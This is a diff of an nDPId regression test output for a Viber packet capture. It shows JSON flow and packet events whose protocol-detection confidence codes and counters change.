laX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="} -00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":425,"source":"viber.pcap","alias":"nDPId-test","packets-captured":425,"packets-processed":420,"total-skipped-flows":0,"total-l4-payload-len":122215,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":23,"total-detection-updates":17,"total-updates":0,"current-active-flows":26,"total-active-flows":26,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":136,"global_ts_msec":1648952182644} +00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":425,"source":"viber.pcap","alias":"nDPId-test","packets-captured":425,"packets-processed":420,"total-skipped-flows":0,"total-l4-payload-len":122215,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":23,"total-detection-updates":19,"total-updates":0,"current-active-flows":26,"total-active-flows":26,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":138,"global_ts_msec":1648952182644} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648952182644,"flow_last_seen":1648952182644,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952182644,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1648952182644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648952182644,"pkt":"eJS0JASgYDjgxTWgCABFAAA8QZ1AAD8GBoHAqAJkNAD8kb4yEJT33RMVAAAAAKAC\/\/+7mwAAAgQFtAQCCApvD0\/7AAAAAAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1648952182749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648952182749,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAAOcGoB00APyRwKgCZBCUvjJ96pBe990TFqASaN8gOAAAAgQFrAQCCArnVjzbbw9P+wEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1648952183355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648952183355,"pkt":"eJS0JASgYDjgxTWgCABFAAA0QZ5AAD8GBojAqAJkNAD8kb4yEJT33RMWfeqQX4AQAKy2OQAAAQEICm8PUPPnVjzb"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648952182644,"flow_last_seen":1648952183458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1648952183458,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1527155640085,"flow_last_seen":1527155641008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6145,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648952182644,"flow_last_seen":1648952183458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1648952183458,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155640085,"flow_last_seen":1527155641008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6145,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1527155670640,"flow_last_seen":1527155677861,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":5405,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155670640,"flow_last_seen":1527155670672,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":2960,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1527155648513,"flow_last_seen":1527155648748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6479,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1527155670640,"flow_last_seen":1527155677861,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":5405,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155670640,"flow_last_seen":1527155670672,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} +00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":140000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":2960,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1527155648513,"flow_last_seen":1527155648748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6479,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1527155638428,"flow_last_seen":1527155685200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":591,"flow_tot_l4_payload_len":5517,"flow_avg_l4_payload_len":95,"midstream":1,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} -00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} +00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646968,"flow_last_seen":1527155666982,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 